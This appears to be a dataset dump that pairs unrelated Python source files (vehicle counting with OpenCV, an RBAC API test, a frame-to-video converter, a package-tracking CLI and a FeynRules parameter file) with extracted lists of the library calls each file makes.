| [((244, 296), 'collections.namedtuple', 'namedtuple', (['"""TopicPartition"""', "['topic', 'partition']"], {}), "('TopicPartition', ['topic', 'partition'])\n", (254, 296), False, 'from collections import namedtuple\n'), ((693, 757), 'collections.namedtuple', 'namedtuple', (['"""BrokerMetadata"""', "['nodeId', 'host', 'port', 'rack']"], {}), "('BrokerMetadata', ['nodeId', 'host', 'port', 'rack'])\n", (703, 757), False, 'from collections import namedtuple\n'), ((1460, 1557), 'collections.namedtuple', 'namedtuple', (['"""PartitionMetadata"""', "['topic', 'partition', 'leader', 'replicas', 'isr', 'error']"], {}), "('PartitionMetadata', ['topic', 'partition', 'leader', 'replicas',\n 'isr', 'error'])\n", (1470, 1557), False, 'from collections import namedtuple\n'), ((1970, 2025), 'collections.namedtuple', 'namedtuple', (['"""OffsetAndMetadata"""', "['offset', 'metadata']"], {}), "('OffsetAndMetadata', ['offset', 'metadata'])\n", (1980, 2025), False, 'from collections import namedtuple\n'), ((2275, 2332), 'collections.namedtuple', 'namedtuple', (['"""OffsetAndTimestamp"""', "['offset', 'timestamp']"], {}), "('OffsetAndTimestamp', ['offset', 'timestamp'])\n", (2285, 2332), False, 'from collections import namedtuple\n'), ((2358, 2476), 'collections.namedtuple', 'namedtuple', (['"""MemberInformation"""', "['member_id', 'client_id', 'client_host', 'member_metadata',\n 'member_assignment']"], {}), "('MemberInformation', ['member_id', 'client_id', 'client_host',\n 'member_metadata', 'member_assignment'])\n", (2368, 2476), False, 'from collections import namedtuple\n'), ((2497, 2630), 'collections.namedtuple', 'namedtuple', (['"""GroupInformation"""', "['error_code', 'group', 'state', 'protocol_type', 'protocol', 'members',\n 'authorized_operations']"], {}), "('GroupInformation', ['error_code', 'group', 'state',\n 'protocol_type', 'protocol', 'members', 'authorized_operations'])\n", (2507, 2630), False, 'from collections import namedtuple\n'), ((2850, 2922), 'collections.namedtuple', 'namedtuple', (['"""RetryOptions"""', "['limit', 'backoff_ms', 'retry_on_timeouts']"], {}), "('RetryOptions', ['limit', 'backoff_ms', 'retry_on_timeouts'])\n", (2860, 2922), False, 'from collections import namedtuple\n')] |
import cv2
from trackers.tracker import create_blob, add_new_blobs, remove_duplicates
import numpy as np
from collections import OrderedDict
from detectors.detector import get_bounding_boxes
import uuid
import os
import contextlib
from datetime import datetime
import argparse
from utils.detection_roi import get_roi_frame, draw_roi
from counter import get_counting_line, is_passed_counting_line
# parse CLI arguments
parser = argparse.ArgumentParser()
parser.add_argument('video', help='relative/absolute path to video or camera input of traffic scene')
parser.add_argument('--iscam', action='store_true', help='specify if video capture is from a camera')
parser.add_argument('--droi', help='specify a detection region of interest (ROI) \
i.e a set of vertices that represent the area (polygon) \
where you want detections to be made (format: 1,2|3,4|5,6|7,8|9,10 \
default: 0,0|frame_width,0|frame_width,frame_height|0,frame_height \
[i.e the whole video frame])')
parser.add_argument('--showdroi', action='store_true', help='display/overlay the detection roi on the video')
parser.add_argument('--mctf', type=int, help='maximum consecutive tracking failures \
i.e number of tracking failures before the tracker concludes \
the tracked object has left the frame')
parser.add_argument('--di', type=int, help='detection interval i.e number of frames \
before detection is carried out again (in order to find new vehicles \
and update the trackers of old ones)')
parser.add_argument('--detector', help='select a model/algorithm to use for vehicle detection \
(options: yolo, haarc, bgsub, ssd | default: yolo)')
parser.add_argument('--tracker', help='select a model/algorithm to use for vehicle tracking \
(options: csrt, kcf, camshift | default: kcf)')
parser.add_argument('--record', action='store_true', help='record video and vehicle count logs')
parser.add_argument('--clposition', help='position of counting line (options: top, bottom, \
left, right | default: bottom)')
parser.add_argument('--hideimage', action='store_true', help='hide resulting image')
args = parser.parse_args()
# capture traffic scene video
video = int(args.video) if args.iscam else args.video
cap = cv2.VideoCapture(video)
_, frame = cap.read()
# configs
blobs = OrderedDict()
blob_id = 1
frame_counter = 0
DETECTION_INTERVAL = 10 if args.di == None else args.di
MAX_CONSECUTIVE_TRACKING_FAILURES = 3 if args.mctf == None else args.mctf
detector = 'yolo' if args.detector == None else args.detector
tracker = 'kcf' if args.tracker == None else args.tracker
f_height, f_width, _ = frame.shape
# init video object and log file to record counting
if args.record:
output_video = cv2.VideoWriter('./videos/output.avi', cv2.VideoWriter_fourcc('M','J','P','G'), 30, (f_width, f_height))
log_file_name = 'log.txt'
with contextlib.suppress(FileNotFoundError):
os.remove(log_file_name)
log_file = open(log_file_name, 'a')
log_file.write('vehicle_id, count, datetime\n')
log_file.flush()
# set counting line
clposition = 'bottom' if args.clposition == None else args.clposition
counting_line = get_counting_line(clposition, f_width, f_height)
vehicle_count = 0
# create detection ROI
droi = [(0, 0), (f_width, 0), (f_width, f_height), (0, f_height)]
if args.droi:
droi = []
points = args.droi.replace(' ', '').split('|')
for point_str in points:
point = tuple(map(int, point_str.split(',')))
droi.append(point)
# initialize trackers and create new blobs
droi_frame = get_roi_frame(frame, droi)
initial_bboxes = get_bounding_boxes(droi_frame, detector)
for box in initial_bboxes:
_blob = create_blob(box, frame, tracker)
blobs[blob_id] = _blob
blob_id += 1
while True:
k = cv2.waitKey(1)
if args.iscam or cap.get(cv2.CAP_PROP_POS_FRAMES) + 1 < cap.get(cv2.CAP_PROP_FRAME_COUNT):
_, frame = cap.read()
nframes = cap.get(cv2.CAP_PROP_POS_FRAMES)
frame_count = cap.get(cv2.CAP_PROP_FRAME_COUNT)
if nframes % 10 == 0 or nframes == 1:
print("Processing {} of {} frames".format(nframes,frame_count))
for _id, blob in list(blobs.items()):
# update trackers
success, box = blob.tracker.update(frame)
if success:
blob.num_consecutive_tracking_failures = 0
blob.update(box)
else:
blob.num_consecutive_tracking_failures += 1
# delete untracked blobs
if blob.num_consecutive_tracking_failures >= MAX_CONSECUTIVE_TRACKING_FAILURES:
del blobs[_id]
# count vehicles
if is_passed_counting_line(blob.centroid, counting_line, clposition) and not blob.counted:
blob.counted = True
vehicle_count += 1
# log count data to a file (vehicle_id, count, datetime)
if args.record:
_row = '{0}, {1}, {2}\n'.format('v_' + str(_id), vehicle_count, datetime.now())
log_file.write(_row)
log_file.flush()
if frame_counter >= DETECTION_INTERVAL:
# rerun detection
droi_frame = get_roi_frame(frame, droi)
boxes = get_bounding_boxes(droi_frame, detector)
blobs, current_blob_id = add_new_blobs(boxes, blobs, frame, tracker, blob_id, counting_line, clposition)
blob_id = current_blob_id
blobs = remove_duplicates(blobs)
frame_counter = 0
# draw and label blob bounding boxes
for _id, blob in blobs.items():
(x, y, w, h) = [int(v) for v in blob.bounding_box]
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.putText(frame, 'v_' + str(_id), (x, y - 2), cv2.FONT_HERSHEY_DUPLEX, 1, (0, 255, 0), 2, cv2.LINE_AA)
# draw counting line
cv2.line(frame, counting_line[0], counting_line[1], (0, 255, 0), 3)
# display vehicle count
cv2.putText(frame, 'Count: ' + str(vehicle_count), (20, 60), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 2, cv2.LINE_AA)
# show detection roi
if args.showdroi:
frame = draw_roi(frame, droi)
# save frame in video output
if args.record:
output_video.write(frame)
# visualize vehicle counting
if not args.hideimage:
resized_frame = cv2.resize(frame, (858, 480))
cv2.imshow('tracking', resized_frame)
frame_counter += 1
# save frame if 's' key is pressed
if k & 0xFF == ord('s'):
cv2.imwrite(os.path.join('screenshots', 'ss_' + uuid.uuid4().hex + '.png'), frame)
print('Screenshot taken.')
else:
print('End of video.')
# end video loop if on the last frame
break
# end video loop if 'q' key is pressed
if k & 0xFF == ord('q'):
print('Video exited.')
break
# end capture, close window, close log file and video objects if any
cap.release()
if not args.hideimage:
cv2.destroyAllWindows()
if args.record:
log_file.close()
output_video.release() | [
"cv2.rectangle",
"cv2.imshow",
"cv2.destroyAllWindows",
"trackers.tracker.create_blob",
"os.remove",
"trackers.tracker.remove_duplicates",
"utils.detection_roi.draw_roi",
"argparse.ArgumentParser",
"utils.detection_roi.get_roi_frame",
"cv2.line",
"counter.get_counting_line",
"contextlib.suppress",
"counter.is_passed_counting_line",
"cv2.VideoWriter_fourcc",
"cv2.waitKey",
"collections.OrderedDict",
"uuid.uuid4",
"detectors.detector.get_bounding_boxes",
"trackers.tracker.add_new_blobs",
"cv2.resize",
"datetime.datetime.now",
"cv2.VideoCapture"
]
| [((429, 454), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (452, 454), False, 'import argparse\n'), ((2403, 2426), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video'], {}), '(video)\n', (2419, 2426), False, 'import cv2\n'), ((2468, 2481), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (2479, 2481), False, 'from collections import OrderedDict\n'), ((3323, 3371), 'counter.get_counting_line', 'get_counting_line', (['clposition', 'f_width', 'f_height'], {}), '(clposition, f_width, f_height)\n', (3340, 3371), False, 'from counter import get_counting_line, is_passed_counting_line\n'), ((3726, 3752), 'utils.detection_roi.get_roi_frame', 'get_roi_frame', (['frame', 'droi'], {}), '(frame, droi)\n', (3739, 3752), False, 'from utils.detection_roi import get_roi_frame, draw_roi\n'), ((3770, 3810), 'detectors.detector.get_bounding_boxes', 'get_bounding_boxes', (['droi_frame', 'detector'], {}), '(droi_frame, detector)\n', (3788, 3810), False, 'from detectors.detector import get_bounding_boxes\n'), ((3850, 3882), 'trackers.tracker.create_blob', 'create_blob', (['box', 'frame', 'tracker'], {}), '(box, frame, tracker)\n', (3861, 3882), False, 'from trackers.tracker import create_blob, add_new_blobs, remove_duplicates\n'), ((3948, 3962), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3959, 3962), False, 'import cv2\n'), ((7270, 7293), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (7291, 7293), False, 'import cv2\n'), ((2924, 2966), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (['"""M"""', '"""J"""', '"""P"""', '"""G"""'], {}), "('M', 'J', 'P', 'G')\n", (2946, 2966), False, 'import cv2\n'), ((3030, 3068), 'contextlib.suppress', 'contextlib.suppress', (['FileNotFoundError'], {}), '(FileNotFoundError)\n', (3049, 3068), False, 'import contextlib\n'), ((3078, 3102), 'os.remove', 'os.remove', (['log_file_name'], {}), '(log_file_name)\n', (3087, 3102), False, 'import os\n'), ((6099, 6166), 'cv2.line', 'cv2.line', (['frame', 'counting_line[0]', 'counting_line[1]', '(0, 255, 0)', '(3)'], {}), '(frame, counting_line[0], counting_line[1], (0, 255, 0), 3)\n', (6107, 6166), False, 'import cv2\n'), ((5404, 5430), 'utils.detection_roi.get_roi_frame', 'get_roi_frame', (['frame', 'droi'], {}), '(frame, droi)\n', (5417, 5430), False, 'from utils.detection_roi import get_roi_frame, draw_roi\n'), ((5451, 5491), 'detectors.detector.get_bounding_boxes', 'get_bounding_boxes', (['droi_frame', 'detector'], {}), '(droi_frame, detector)\n', (5469, 5491), False, 'from detectors.detector import get_bounding_boxes\n'), ((5529, 5608), 'trackers.tracker.add_new_blobs', 'add_new_blobs', (['boxes', 'blobs', 'frame', 'tracker', 'blob_id', 'counting_line', 'clposition'], {}), '(boxes, blobs, frame, tracker, blob_id, counting_line, clposition)\n', (5542, 5608), False, 'from trackers.tracker import create_blob, add_new_blobs, remove_duplicates\n'), ((5667, 5691), 'trackers.tracker.remove_duplicates', 'remove_duplicates', (['blobs'], {}), '(blobs)\n', (5684, 5691), False, 'from trackers.tracker import create_blob, add_new_blobs, remove_duplicates\n'), ((5883, 5943), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x, y)', '(x + w, y + h)', '(0, 255, 0)', '(2)'], {}), '(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n', (5896, 5943), False, 'import cv2\n'), ((6402, 6423), 'utils.detection_roi.draw_roi', 'draw_roi', (['frame', 'droi'], {}), '(frame, droi)\n', (6410, 6423), False, 'from utils.detection_roi import get_roi_frame, draw_roi\n'), ((6621, 6650), 'cv2.resize', 'cv2.resize', (['frame', '(858, 480)'], {}), '(frame, (858, 480))\n', (6631, 6650), False, 'import cv2\n'), ((6663, 6700), 'cv2.imshow', 'cv2.imshow', (['"""tracking"""', 'resized_frame'], {}), "('tracking', resized_frame)\n", (6673, 6700), False, 'import cv2\n'), ((4857, 4922), 'counter.is_passed_counting_line', 'is_passed_counting_line', (['blob.centroid', 'counting_line', 'clposition'], {}), '(blob.centroid, counting_line, clposition)\n', (4880, 4922), False, 'from counter import get_counting_line, is_passed_counting_line\n'), ((5206, 5220), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5218, 5220), False, 'from datetime import datetime\n'), ((6866, 6878), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (6876, 6878), False, 'import uuid\n')] |
# Copyright 2018 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
""" Propose Role Add Member Test """
# pylint: disable=invalid-name
import time
import requests
import pytest
from rbac.common.logs import get_logger
from tests.rbac import helper
from tests.rbac.api.assertions import assert_api_error
from tests.rbac.api.assertions import assert_api_success
from tests.rbac.api.assertions import assert_api_post_requires_auth
LOGGER = get_logger(__name__)
@pytest.mark.api
@pytest.mark.api_role
def test_api_propose_role_member():
""" Test a user proposing to add themselves to a role
"""
owner = helper.api.user.current
role = helper.api.role.create.new(user=owner)
user = helper.api.user.current2
url = helper.api.role.member.propose.url(role_id=role["id"])
data = {"id": user["user_id"]}
assert assert_api_post_requires_auth(url=url, json=data)
response = requests.post(
url=url, headers={"Authorization": user["token"]}, json=data
)
result = assert_api_success(response)
assert result["proposal_id"]
time.sleep(0.5) # temporary until API refactored to return the proposal
proposal = helper.api.proposal.get(result["proposal_id"], owner)
assert proposal["id"] == result["proposal_id"]
assert proposal["status"] == "OPEN"
assert proposal["type"] == "ADD_ROLE_MEMBER"
assert proposal["object"] == role["id"]
assert proposal["target"] == user["user_id"]
assert proposal["opener"] == user["user_id"]
@pytest.mark.api
@pytest.mark.api_role
def test_api_propose_role_member_required_fields():
""" Test proposing adding a member to a role with missing fields
"""
role, _ = helper.api.role.current
user = helper.api.user.create.current
url = helper.api.role.member.propose.url(role_id=role["id"])
data = {}
response = requests.post(
url=url, headers={"Authorization": user["token"]}, json=data
)
assert_api_error(response, "Bad Request: id field is required", 400)
| [
"requests.post",
"tests.rbac.helper.api.role.member.propose.url",
"tests.rbac.api.assertions.assert_api_success",
"tests.rbac.helper.api.proposal.get",
"tests.rbac.helper.api.role.create.new",
"time.sleep",
"tests.rbac.api.assertions.assert_api_error",
"tests.rbac.api.assertions.assert_api_post_requires_auth",
"rbac.common.logs.get_logger"
]
| [((1053, 1073), 'rbac.common.logs.get_logger', 'get_logger', (['__name__'], {}), '(__name__)\n', (1063, 1073), False, 'from rbac.common.logs import get_logger\n'), ((1264, 1302), 'tests.rbac.helper.api.role.create.new', 'helper.api.role.create.new', ([], {'user': 'owner'}), '(user=owner)\n', (1290, 1302), False, 'from tests.rbac import helper\n'), ((1349, 1403), 'tests.rbac.helper.api.role.member.propose.url', 'helper.api.role.member.propose.url', ([], {'role_id': "role['id']"}), "(role_id=role['id'])\n", (1383, 1403), False, 'from tests.rbac import helper\n'), ((1450, 1499), 'tests.rbac.api.assertions.assert_api_post_requires_auth', 'assert_api_post_requires_auth', ([], {'url': 'url', 'json': 'data'}), '(url=url, json=data)\n', (1479, 1499), False, 'from tests.rbac.api.assertions import assert_api_post_requires_auth\n'), ((1515, 1590), 'requests.post', 'requests.post', ([], {'url': 'url', 'headers': "{'Authorization': user['token']}", 'json': 'data'}), "(url=url, headers={'Authorization': user['token']}, json=data)\n", (1528, 1590), False, 'import requests\n'), ((1618, 1646), 'tests.rbac.api.assertions.assert_api_success', 'assert_api_success', (['response'], {}), '(response)\n', (1636, 1646), False, 'from tests.rbac.api.assertions import assert_api_success\n'), ((1684, 1699), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (1694, 1699), False, 'import time\n'), ((1772, 1825), 'tests.rbac.helper.api.proposal.get', 'helper.api.proposal.get', (["result['proposal_id']", 'owner'], {}), "(result['proposal_id'], owner)\n", (1795, 1825), False, 'from tests.rbac import helper\n'), ((2368, 2422), 'tests.rbac.helper.api.role.member.propose.url', 'helper.api.role.member.propose.url', ([], {'role_id': "role['id']"}), "(role_id=role['id'])\n", (2402, 2422), False, 'from tests.rbac import helper\n'), ((2452, 2527), 'requests.post', 'requests.post', ([], {'url': 'url', 'headers': "{'Authorization': user['token']}", 'json': 'data'}), "(url=url, headers={'Authorization': user['token']}, json=data)\n", (2465, 2527), False, 'import requests\n'), ((2546, 2614), 'tests.rbac.api.assertions.assert_api_error', 'assert_api_error', (['response', '"""Bad Request: id field is required"""', '(400)'], {}), "(response, 'Bad Request: id field is required', 400)\n", (2562, 2614), False, 'from tests.rbac.api.assertions import assert_api_error\n')] |
import cv2
import os
import numpy as np
from PIL import Image
def frame2video(im_dir, video_dir, fps):
im_list = os.listdir(im_dir)
im_list.sort(key=lambda x: int(x.replace("_RBPNF7", "").split('.')[0]))
img = Image.open(os.path.join(im_dir, im_list[0]))
img_size = img.size # 获得图片分辨率,im_dir文件夹下的图片分辨率需要一致
fourcc = cv2.VideoWriter_fourcc(*'XVID')
videoWriter = cv2.VideoWriter(video_dir, fourcc, fps, img_size)
for i in im_list:
im_name = os.path.join(im_dir + i)
frame = cv2.imdecode(np.fromfile(im_name, dtype=np.uint8), -1)
videoWriter.write(frame)
videoWriter.release()
if __name__ == '__main__':
im_dir = '/media/hy/Seagate Expansion Drive/Results/merge_dir/' # 帧存放路径
video_dir = '/media/hy/Seagate Expansion Drive/Results/sandy.mp4' # 合成视频存放的路径
fps = 15 # 帧率
frame2video(im_dir, video_dir, fps)
| [
"numpy.fromfile",
"os.listdir",
"os.path.join",
"cv2.VideoWriter",
"cv2.VideoWriter_fourcc"
]
| [((119, 137), 'os.listdir', 'os.listdir', (['im_dir'], {}), '(im_dir)\n', (129, 137), False, 'import os\n'), ((338, 369), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'XVID'"], {}), "(*'XVID')\n", (360, 369), False, 'import cv2\n'), ((388, 437), 'cv2.VideoWriter', 'cv2.VideoWriter', (['video_dir', 'fourcc', 'fps', 'img_size'], {}), '(video_dir, fourcc, fps, img_size)\n', (403, 437), False, 'import cv2\n'), ((235, 267), 'os.path.join', 'os.path.join', (['im_dir', 'im_list[0]'], {}), '(im_dir, im_list[0])\n', (247, 267), False, 'import os\n'), ((478, 502), 'os.path.join', 'os.path.join', (['(im_dir + i)'], {}), '(im_dir + i)\n', (490, 502), False, 'import os\n'), ((532, 568), 'numpy.fromfile', 'np.fromfile', (['im_name'], {'dtype': 'np.uint8'}), '(im_name, dtype=np.uint8)\n', (543, 568), True, 'import numpy as np\n')] |
# coding: utf-8
import click
@click.command()
@click.option('--carrier', prompt='Carrier ID', help='Example: "ect" for Correios')
@click.option('--object-id', prompt='Object ID',
help='Example: PN871429404BR')
def main(carrier, object_id):
from trackr import Trackr
from trackr.exceptions import PackageNotFound
try:
p = Trackr.track(carrier, object_id)
except PackageNotFound as e:
click.echo(click.style(
u'Package with object ID {} ({}) not found'.format(
object_id, carrier),
fg='red')
)
if e.carrier_message:
click.echo(click.style(
u'Carrier message: {}'.format(e.carrier_message),
fg='red',)
)
return
click.echo(click.style(u'Package found!', fg='green'))
for t in p.tracking_info:
click.echo(t.__unicode__())
if __name__ == "__main__":
main()
| [
"click.option",
"click.command",
"trackr.Trackr.track",
"click.style"
]
| [((32, 47), 'click.command', 'click.command', ([], {}), '()\n', (45, 47), False, 'import click\n'), ((49, 136), 'click.option', 'click.option', (['"""--carrier"""'], {'prompt': '"""Carrier ID"""', 'help': '"""Example: "ect" for Correios"""'}), '(\'--carrier\', prompt=\'Carrier ID\', help=\n \'Example: "ect" for Correios\')\n', (61, 136), False, 'import click\n'), ((133, 211), 'click.option', 'click.option', (['"""--object-id"""'], {'prompt': '"""Object ID"""', 'help': '"""Example: PN871429404BR"""'}), "('--object-id', prompt='Object ID', help='Example: PN871429404BR')\n", (145, 211), False, 'import click\n'), ((358, 390), 'trackr.Trackr.track', 'Trackr.track', (['carrier', 'object_id'], {}), '(carrier, object_id)\n', (370, 390), False, 'from trackr import Trackr\n'), ((794, 836), 'click.style', 'click.style', (['u"""Package found!"""'], {'fg': '"""green"""'}), "(u'Package found!', fg='green')\n", (805, 836), False, 'import click\n')] |
# This file was automatically created by FeynRules 2.3.32
# Mathematica version: 11.3.0 for Mac OS X x86 (64-bit) (March 7, 2018)
# Date: Sat 21 Apr 2018 20:48:39
from object_library import all_parameters, Parameter
from function_library import complexconjugate, re, im, csc, sec, acsc, asec, cot
# This is a default parameter object representing 0.
ZERO = Parameter(name = 'ZERO',
nature = 'internal',
type = 'real',
value = '0.0',
texname = '0')
# User-defined parameters.
cabi = Parameter(name = 'cabi',
nature = 'external',
type = 'real',
value = 0.227736,
texname = '\\theta _c',
lhablock = 'CKMBLOCK',
lhacode = [ 1 ])
aEWM1 = Parameter(name = 'aEWM1',
nature = 'external',
type = 'real',
value = 127.9,
texname = '\\text{aEWM1}',
lhablock = 'SMINPUTS',
lhacode = [ 1 ])
Gf = Parameter(name = 'Gf',
nature = 'external',
type = 'real',
value = 0.0000116637,
texname = 'G_f',
lhablock = 'SMINPUTS',
lhacode = [ 2 ])
aS = Parameter(name = 'aS',
nature = 'external',
type = 'real',
value = 0.1184,
texname = '\\alpha _s',
lhablock = 'SMINPUTS',
lhacode = [ 3 ])
ymdo = Parameter(name = 'ymdo',
nature = 'external',
type = 'real',
value = 0.00504,
texname = '\\text{ymdo}',
lhablock = 'YUKAWA',
lhacode = [ 1 ])
ymup = Parameter(name = 'ymup',
nature = 'external',
type = 'real',
value = 0.00255,
texname = '\\text{ymup}',
lhablock = 'YUKAWA',
lhacode = [ 2 ])
yms = Parameter(name = 'yms',
nature = 'external',
type = 'real',
value = 0.101,
texname = '\\text{yms}',
lhablock = 'YUKAWA',
lhacode = [ 3 ])
ymc = Parameter(name = 'ymc',
nature = 'external',
type = 'real',
value = 1.27,
texname = '\\text{ymc}',
lhablock = 'YUKAWA',
lhacode = [ 4 ])
ymb = Parameter(name = 'ymb',
nature = 'external',
type = 'real',
value = 4.7,
texname = '\\text{ymb}',
lhablock = 'YUKAWA',
lhacode = [ 5 ])
ymt = Parameter(name = 'ymt',
nature = 'external',
type = 'real',
value = 172,
texname = '\\text{ymt}',
lhablock = 'YUKAWA',
lhacode = [ 6 ])
yme = Parameter(name = 'yme',
nature = 'external',
type = 'real',
value = 0.000511,
texname = '\\text{yme}',
lhablock = 'YUKAWA',
lhacode = [ 11 ])
ymm = Parameter(name = 'ymm',
nature = 'external',
type = 'real',
value = 0.10566,
texname = '\\text{ymm}',
lhablock = 'YUKAWA',
lhacode = [ 13 ])
ymtau = Parameter(name = 'ymtau',
nature = 'external',
type = 'real',
value = 1.777,
texname = '\\text{ymtau}',
lhablock = 'YUKAWA',
lhacode = [ 15 ])
kq = Parameter(name = 'kq',
nature = 'external',
type = 'real',
value = 0.001,
texname = 'k_q',
lhablock = 'FRBlock',
lhacode = [ 1 ])
lamf = Parameter(name = 'lamf',
nature = 'external',
type = 'real',
value = 0.1,
texname = 'l_{\\text{fi}}',
lhablock = 'FRBlock',
lhacode = [ 2 ])
yf1x1 = Parameter(name = 'yf1x1',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf1x1}',
lhablock = 'FRBlock6',
lhacode = [ 1, 1 ])
yf1x2 = Parameter(name = 'yf1x2',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf1x2}',
lhablock = 'FRBlock6',
lhacode = [ 1, 2 ])
yf1x3 = Parameter(name = 'yf1x3',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf1x3}',
lhablock = 'FRBlock6',
lhacode = [ 1, 3 ])
yf2x1 = Parameter(name = 'yf2x1',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf2x1}',
lhablock = 'FRBlock6',
lhacode = [ 2, 1 ])
yf2x2 = Parameter(name = 'yf2x2',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf2x2}',
lhablock = 'FRBlock6',
lhacode = [ 2, 2 ])
yf2x3 = Parameter(name = 'yf2x3',
nature = 'external',
type = 'complex',
value = 1.e-6,
texname = '\\text{yf2x3}',
lhablock = 'FRBlock6',
lhacode = [ 2, 3 ])
yf3x1 = Parameter(name = 'yf3x1',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf3x1}',
lhablock = 'FRBlock6',
lhacode = [ 3, 1 ])
yf3x2 = Parameter(name = 'yf3x2',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf3x2}',
lhablock = 'FRBlock6',
lhacode = [ 3, 2 ])
yf3x3 = Parameter(name = 'yf3x3',
nature = 'external',
type = 'complex',
value = 0,
texname = '\\text{yf3x3}',
lhablock = 'FRBlock6',
lhacode = [ 3, 3 ])
MZ = Parameter(name = 'MZ',
nature = 'external',
type = 'real',
value = 91.1876,
texname = '\\text{MZ}',
lhablock = 'MASS',
lhacode = [ 23 ])
Me = Parameter(name = 'Me',
nature = 'external',
type = 'real',
value = 0.000511,
texname = '\\text{Me}',
lhablock = 'MASS',
lhacode = [ 11 ])
MMU = Parameter(name = 'MMU',
nature = 'external',
type = 'real',
value = 0.10566,
texname = '\\text{MMU}',
lhablock = 'MASS',
lhacode = [ 13 ])
MTA = Parameter(name = 'MTA',
nature = 'external',
type = 'real',
value = 1.777,
texname = '\\text{MTA}',
lhablock = 'MASS',
lhacode = [ 15 ])
MU = Parameter(name = 'MU',
nature = 'external',
type = 'real',
value = 0.00255,
texname = 'M',
lhablock = 'MASS',
lhacode = [ 2 ])
MC = Parameter(name = 'MC',
nature = 'external',
type = 'real',
value = 1.27,
texname = '\\text{MC}',
lhablock = 'MASS',
lhacode = [ 4 ])
MT = Parameter(name = 'MT',
nature = 'external',
type = 'real',
value = 172,
texname = '\\text{MT}',
lhablock = 'MASS',
lhacode = [ 6 ])
MD = Parameter(name = 'MD',
nature = 'external',
type = 'real',
value = 0.00504,
texname = '\\text{MD}',
lhablock = 'MASS',
lhacode = [ 1 ])
MS = Parameter(name = 'MS',
nature = 'external',
type = 'real',
value = 0.101,
texname = '\\text{MS}',
lhablock = 'MASS',
lhacode = [ 3 ])
MB = Parameter(name = 'MB',
nature = 'external',
type = 'real',
value = 4.7,
texname = '\\text{MB}',
lhablock = 'MASS',
lhacode = [ 5 ])
MH = Parameter(name = 'MH',
nature = 'external',
type = 'real',
value = 125,
texname = '\\text{MH}',
lhablock = 'MASS',
lhacode = [ 25 ])
MP = Parameter(name = 'MP',
nature = 'external',
type = 'real',
value = 120,
texname = '\\text{MP}',
lhablock = 'MASS',
lhacode = [ 9000005 ])
Mfi = Parameter(name = 'Mfi',
nature = 'external',
type = 'real',
value = 10,
texname = '\\text{Mfi}',
lhablock = 'MASS',
lhacode = [ 9000006 ])
WZ = Parameter(name = 'WZ',
nature = 'external',
type = 'real',
value = 2.4952,
texname = '\\text{WZ}',
lhablock = 'DECAY',
lhacode = [ 23 ])
WW = Parameter(name = 'WW',
nature = 'external',
type = 'real',
value = 2.085,
texname = '\\text{WW}',
lhablock = 'DECAY',
lhacode = [ 24 ])
WT = Parameter(name = 'WT',
nature = 'external',
type = 'real',
value = 1.50833649,
texname = '\\text{WT}',
lhablock = 'DECAY',
lhacode = [ 6 ])
WH = Parameter(name = 'WH',
nature = 'external',
type = 'real',
value = 0.00589569,
texname = '\\text{WH}',
lhablock = 'DECAY',
lhacode = [ 25 ])
WH1 = Parameter(name = 'WH1',
nature = 'external',
type = 'real',
value = 0.00575308848,
texname = '\\text{WH1}',
lhablock = 'DECAY',
lhacode = [ 9000005 ])
Wfi = Parameter(name = 'Wfi',
nature = 'external',
type = 'real',
value = 6.03044e-9,
texname = '\\text{Wfi}',
lhablock = 'DECAY',
lhacode = [ 9000006 ])
aEW = Parameter(name = 'aEW',
nature = 'internal',
type = 'real',
value = '1/aEWM1',
texname = '\\alpha _{\\text{EW}}')
G = Parameter(name = 'G',
nature = 'internal',
type = 'real',
value = '2*cmath.sqrt(aS)*cmath.sqrt(cmath.pi)',
texname = 'G')
CKM1x1 = Parameter(name = 'CKM1x1',
nature = 'internal',
type = 'complex',
value = 'cmath.cos(cabi)',
texname = '\\text{CKM1x1}')
CKM1x2 = Parameter(name = 'CKM1x2',
nature = 'internal',
type = 'complex',
value = 'cmath.sin(cabi)',
texname = '\\text{CKM1x2}')
CKM1x3 = Parameter(name = 'CKM1x3',
nature = 'internal',
type = 'complex',
value = '0',
texname = '\\text{CKM1x3}')
CKM2x1 = Parameter(name = 'CKM2x1',
nature = 'internal',
type = 'complex',
value = '-cmath.sin(cabi)',
texname = '\\text{CKM2x1}')
CKM2x2 = Parameter(name = 'CKM2x2',
nature = 'internal',
type = 'complex',
value = 'cmath.cos(cabi)',
texname = '\\text{CKM2x2}')
CKM2x3 = Parameter(name = 'CKM2x3',
nature = 'internal',
type = 'complex',
value = '0',
texname = '\\text{CKM2x3}')
CKM3x1 = Parameter(name = 'CKM3x1',
nature = 'internal',
type = 'complex',
value = '0',
texname = '\\text{CKM3x1}')
CKM3x2 = Parameter(name = 'CKM3x2',
nature = 'internal',
type = 'complex',
value = '0',
texname = '\\text{CKM3x2}')
